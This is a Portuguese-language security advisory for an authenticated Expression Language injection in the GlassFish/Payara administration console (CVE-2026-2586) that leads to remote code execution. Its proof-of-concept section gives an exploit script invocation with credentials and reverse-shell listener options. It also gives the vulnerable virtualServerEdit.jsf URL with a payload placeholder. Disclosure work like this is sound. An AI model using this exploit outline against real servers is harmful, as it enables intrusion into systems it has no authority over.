RCE por Injeção de EL Autenticada no GlassFish (CVE-2026-2586)
Uma vulnerabilidade de Injeção de Expression Language no Console de Administração do GlassFish permite que um usuário autenticado injete expressões EL maliciosas em parâmetros processados pela interface web administrativa. A exploração bem-sucedida pode levar à execução remota de comandos no servidor afetado.
A vulnerabilidade foi identificada no fluxo de edição da configuração virtual do servidor, onde parâmetros controláveis pelo usuário são interpretados de forma insegura pela aplicação.
Isso ocorre porque:
- A interface administrativa processa parâmetros controlados pelo usuário dentro de expressões EL.
- A entrada não é devidamente validada ou neutralizada antes de ser interpretada pelo backend.
- Um usuário autenticado no console administrativo pode abusar do comportamento vulnerável para invocar classes e métodos Java.
- Em um cenário de exploração bem-sucedida, um atacante com credenciais válidas poderia executar comandos no sistema operacional subjacente.
Componente Afetado
- Produto: Console de Administração GlassFish / Payara
- CVE: CVE-2026-2586
- Tipo: Injeção de Expression Language
- Impacto: Execução Remota de Código Autenticada
- Vetor: Interface web administrativa
Prova de Conceito
O teste foi realizado em um ambiente local e controlado.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
URL vulnerável:
https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true
Aviso Legal
APENAS PARA USO AUTORIZADO. A DeepSecurity Perú não endossa acesso não autorizado e não se responsabiliza por qualquer uso indevido das informações fornecidas.